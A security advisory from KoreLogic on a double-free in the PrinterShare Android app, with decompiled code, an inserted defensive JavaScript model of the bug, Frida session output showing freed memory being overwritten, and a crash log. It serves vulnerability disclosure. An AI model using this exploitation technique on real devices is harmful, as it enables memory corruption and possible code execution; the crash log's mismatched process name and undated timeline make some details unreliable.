Security Advisory

Mobile Dynamix PrinterShare Mobile Print Double-Free Memory Write

Advisory ID
KL-001-2025-005
Published
2025-05-22
Vendor
Mobile Dynamix

Affected Systems

Product
PrinterShare Mobile Print
Version
up to 12.15.01
Platform
Android

Discovered By

Felix Segoviano (KoreLogic)

Vulnerability Details

Affected Vendor: Mobile Dynamix
Affected Product: PrinterShare Mobile Print
Affected Version: up to 12.15.01
Platform: Android
CWE Classification: CWE-415: Double Free, CWE-416: Use After Free
CVE ID: CVE-2025-5100

Vulnerability Description

A double-free condition occurs during the cleanup of temporary image files, which can be exploited to achieve memory corruption and potentially arbitrary code execution.

Technical Description

The vulnerability is in the bitmap handling in ActivityPrintPictures. The v1() method loads bitmaps from files or content URIs and calls x1() after attempting to decode a bitmap. If an OutOfMemoryError is thrown, the exception handler recycles the bitmap.

The x1() method (visible in the Frida hooks) creates a 512x512 bitmap and immediately recycles it. When an OutOfMemoryError occurs during bitmap loading in v1(), the bitmap is recycled in the error handler:

  public Bitmap v1(l lVar) {
      Bitmap bitmap = null;
      boolean z2 = false;
      for (int i3 = 0; i3 < 3; i3++) {
          try {
              B.e();
              BitmapFactory.Options options = new BitmapFactory.Options();
              options.inPreferredConfig = Bitmap.Config.ARGB_8888;
              options.inDither = false;
              if (i3 > 0) {
                  options.inSampleSize = 1 << i3;
              }
              InputStream fileInputStream = lVar.f5200c != null ? new FileInputStream(lVar.f5200c) : getContentResolver().openInputStream(lVar.f5198a);
              if (fileInputStream != null) {
                  bitmap = BitmapFactory.decodeStream(fileInputStream, null, options);
                  fileInputStream.close();
              }
              x1();
              break;
          } catch (IOException e3) {
              e3.printStackTrace();
              B.A(e3);
          } catch (OutOfMemoryError unused) {
              if (bitmap != null) {
                  bitmap.recycle();
                  bitmap = null;
              }
              if (!z2 && i3 > 0) {
                  B.a();
                  z2 = true;
              }
          }
      }
      return bitmap;
  }

x1() is then called, which creates and recycles another bitmap:

  private void x1() {
      Bitmap createBitmap = Bitmap.createBitmap(512, 512, Bitmap.Config.ARGB_8888);
      if (createBitmap != null) {
          createBitmap.recycle();
      }
  }

The Android memory allocator may reuse the same memory block, which results in the same address being freed twice (double-free).
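To make the two halves of that sentence concrete, the following is an added example (not part of this advisory and not the vendor's code): a toy LIFO free list, which is the property that makes a freed block come back at the same address, and a live-pointer tracker of the kind a malloc/free hook would feed. The tracker flags a free() of an address that is not currently live, and deliberately does not flag legitimate reuse (alloc, free, alloc, free of the same address), which is the distinction a detector for this class of bug must get right. All addresses, the event sequence and the tag names are constructed for illustration.

```javascript
"use strict";

// Toy single-size-class allocator with a LIFO free list and no double-free
// checks. Real Android allocators (scudo, jemalloc) are far more involved;
// this only reproduces the shape that matters here: the most recently freed
// block is the next one handed out.
class ToyAllocator {
  constructor(base) {
    this.nextFresh = base;   // bump pointer for never-used blocks
    this.chunkSize = 0x100;  // constructed chunk size
    this.freeList = [];      // LIFO: last freed, first reused
  }
  alloc() {
    if (this.freeList.length > 0) return this.freeList.pop();
    const addr = this.nextFresh;
    this.nextFresh += this.chunkSize;
    return addr;
  }
  free(addr) {
    // Deliberately unchecked: a second free of the same address puts it on
    // the list twice, so two later allocations will alias each other.
    this.freeList.push(addr);
  }
}

function hex(n) { return "0x" + n.toString(16); }

// Tracker that an instrumentation hook on malloc (return value) and free
// (argument) would drive. A free() of an address that is not in the live
// set is reported; a free() of a live address simply retires it.
class FreeTracker {
  constructor() { this.live = new Set(); this.findings = []; }
  onAlloc(addr) { this.live.add(addr); }
  onFree(addr, tag) {
    if (!this.live.has(addr)) {
      this.findings.push({ addr: hex(addr), tag, kind: "double-free" });
      return false;
    }
    this.live.delete(addr);
    return true;
  }
}

// Replays the shape described in the advisory: a decode allocates a pixel
// buffer, the OOM handler recycles it, x1() allocates (receiving the same
// block back) and recycles it, and finally a stale reference releases the
// block once more. Returns what a reviewer would want to check.
function replayScenario() {
  const heap = new ToyAllocator(0x7f00001000); // constructed base address
  const tracker = new FreeTracker();

  const pixels = heap.alloc();
  tracker.onAlloc(pixels);
  heap.free(pixels);
  tracker.onFree(pixels, "v1() OOM handler recycle()");

  const scratch = heap.alloc();                 // LIFO hands back `pixels`
  tracker.onAlloc(scratch);
  const reused = scratch === pixels;
  heap.free(scratch);
  tracker.onFree(scratch, "x1() recycle()");    // legitimate: block is live

  heap.free(pixels);                            // the bug: block already freed
  tracker.onFree(pixels, "stale reference release");

  // Consequence of the doubled free-list entry: two distinct allocations
  // now receive the same address.
  const a = heap.alloc();
  const b = heap.alloc();
  return { reused, aliased: a === b, findings: tracker.findings };
}

const result = replayScenario();
console.log(JSON.stringify(result, null, 2));
```

In a real run, the tracker's onAlloc and onFree would be called from instrumentation hooks on the process's malloc and free (for Frida, Interceptor.attach with onLeave for malloc's return value and onEnter for free's argument); the allocator model is only there to show why the second bitmap lands on the first bitmap's block. Note that `reused` being true is not itself a finding: address reuse is normal allocator behaviour, and only the third free, of an address no longer in the live set, is reported.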

The following session demonstrates the memory corruption by running the Frida script, which first intercepts freed memory chunks, then writes to that memory and monitors the cache.

    $ frida -U -f com.dynamixsoftware.printershare -l exploit.js
         ____
        / _  |   Frida 16.6.5 - A world-class dynamic instrumentation toolkit
       | (_| |
        > _  |   Commands:
       /_/ |_|       help      -> Displays the help system
       . . . .       object?   -> Display information about 'object'
       . . . .       exit/quit -> Exit
       . . . .
       . . . .   More info at https://frida.re/docs/home/
       . . . .
       . . . .   Connected to SM T220 (id=R83X10JATAV)
    Spawning `com.dynamixsoftware.printershare`...
    [+] Found 'free' function at 0x78b4adbf30 in module: libc.so
    [+] Double-free exploitation script initialized
    [+] Targeting the v1()->x1() bitmap handling vulnerability
    [+] Waiting for free() calls to intercept...
    Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
    [SM T220::com.dynamixsoftware.printershare ]->
    ...SNIP...
    === Memory at 0xb400007820205700 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb400007820205700

    === Memory at 0xb4000078202ad320 BEFORE overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 4d  dalvik/system/VM
    00000010  52 75 6e 74 69 6d 65 00 65 61 64 3b 00 00 00 00  Runtime.ead;....
    00000020  10 71 a1 1d 78 00 00 00 ff ff ff ff ff ff ff ff  .q..x...........
    00000030  00 00 00 00 00 00 00 00 20 d3 2a 20 78 00 00 b4  ........ .* x...
    00000040  01 00 00 00 02 00 00 00 08 8a 31 20 78 00 00 b4  ..........1 x...
    00000050  00 00 00 00 00 00 00 00 60 d2 2a 20 78 00 00 b4  ........`.* x...
    00000060  41 84 07 1d 78 00 00 00 00 66 2f 20 78 00 00 b4  A...x....f/ x...
    00000070  00 00 00 00 00 00 00 00 98 d2 2a 20 78 00 00 b4  ..........* x...
    [+] Successfully wrote 500 bytes to 0xb4000078202ad320

    === Memory at 0xb4000078202ad320 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb4000078202ad320

    === Memory at 0xb4000078202ad300 BEFORE overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  4c 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56  Ldalvik/system/V
    00000010  4d 52 75 6e 74 69 6d 65 3b 00 00 00 1e 00 00 00  MRuntime;.......
    00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Successfully wrote 500 bytes to 0xb4000078202ad300

    === Memory at 0xb4000078202ad300 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb4000078202ad300

    === Memory at 0xb4000078202ad2e0 BEFORE overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  64 61 6c 76 69 6b 2e 73 79 73 74 65 6d 2e 56 4d  dalvik.system.VM
    00000010  52 75 6e 74 69 6d 65 00 61 64 00 20 78 00 00 b4  Runtime.ad. x...
    00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Successfully wrote 500 bytes to 0xb4000078202ad2e0

    === Memory at 0xb4000078202ad2e0 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb4000078202ad2e0
    Process crashed: Bad access due to invalid address

    ***
    *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
    Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
    Revision: '0'
    ABI: 'arm64'
    Processor: '0'
    Timestamp: 2025-03-02 10:54:25.642520460-0800
    Process uptime: 3s
    Cmdline: com.samsung.android.scs
    pid: 32625, tid: 32625, name: ung.android.scs  >>> com.samsung.android.scs <<<
    uid: 10243
    signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414140
        x0  0000000000000001  x1  4141414141414141  x2  0000000072a27ffc  x3  0000000000000001
        x4  0000007feb0e8530  x5  000000781d065ee0  x6  000000000000001a  x7  0000000000000018
        x8  0000007feb0e87c0  x9  4141414141414140  x10 0000007feb0e8150  x11 0000000000000006
        x12 0000000000000069  x13 000000781dc0e180  x14 000000781dc0c598  x15 0000000000000000
        x16 0000000020000001  x17 0000000000000000  x18 00000078ccb6a000  x19 b400007820205650
        x20 b400007820205660  x21 0000000072e625d0  x22 4141414141414141  x23 000000781d776d80
        x24 b4000078202cd400  x25 00000078cc4c1000  x26 000000781dc0d000  x27 0000007feb0e8960
        x28 b400007820244800  x29 0000007feb0e8900
        lr  000000781d2cc408  sp  0000007feb0e86d0  pc  000000781d2cc190  pst 0000000080000000
    backtrace:
          #00 pc 00000000002cc190  /apex/com.android.art/lib64/libart.so (artQuickResolutionTrampoline+2764) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
          #01 pc 000000000037ee08  /apex/com.android.art/lib64/libart.so (art_quick_resolution_trampoline+88) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
          #02 pc 0000000000780108  /apex/com.android.art/lib64/libart.so (nterp_helper+152) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
          #03 pc 000000000003fb3a  /apex/com.android.conscrypt/javalib/conscrypt.jar (com.android.org.conscrypt.TrustedCertificateStore.setDefaultUserDirectory+14)
          #04 pc 0000000000b716dc  /data/misc/apexdata/com.android.art/dalvik-cache/arm64/boot.oat (android.app.ActivityThread.main+764)
    ***
    [SM T220::com.dynamixsoftware.printershare ]->

Mitigation and Remediation Recommendation

No response from vendor. There are no known mitigations available to end users of the affected application versions.

Credit

This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.

Proof of Concept

URL: https://www.korelogic.com/advisories/KL-001-2025-005.poc.js.txt

SHA256sum: 596c119c3b1ef6749d59ff5def5b2e88bca04dde15e86683d074d259458519da

The contents of this advisory are copyright (c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.

KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.

KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.

KoreLogic public disclosure.

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable
